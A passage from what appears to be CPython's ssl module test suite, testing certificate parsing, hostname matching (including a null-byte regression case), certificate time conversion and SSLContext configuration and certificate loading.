self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatement for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
